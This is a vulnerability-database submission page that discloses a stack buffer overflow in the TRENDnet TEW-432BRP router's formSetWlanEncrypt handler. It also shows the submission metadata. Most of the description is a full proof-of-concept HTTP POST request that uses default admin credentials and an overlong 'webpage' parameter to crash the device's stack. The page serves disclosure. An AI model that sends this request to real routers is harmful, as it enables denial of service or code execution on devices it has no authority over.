提出 #814773: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow情報

タイトル	TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
説明	In formSetWlanEncrypt function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code. POST /goform/formSetWlanEncrypt HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/wlan_security.asp?t=1777347015970 Upgrade-Insecure-Requests: 1 wep_type=1&auth_type=2&wep_key_type=0&wep_key_len=5&wep_def_key=0&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&eap_type=0&cipher_type=0&wpapsk1=12345678&wpapsk2=12345678&radius_ip1=x.x.x.x&radius_port1=1812&radius_pass1=&radius_ip2=x.x.x.x&radius_port2=1812&radius_pass2=&save=1&restore_wireless=&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Action=onchange&wps_clear_configure_by_reg=0
ソース	⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_16/16.md
ユーザー	pjq_Buoy (UID 97666)
送信	2026年04月28日 09:14 (1 月 ago)
モデレーション	2026年05月30日 18:28 (1 month later)
ステータス	承諾済み
VulDBエントリ	367460 [TRENDnet TEW-432BRP 3.10B20 formSetWlanEncrypt webpage メモリ破損]
ポイント	20

◂ 前概要次 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!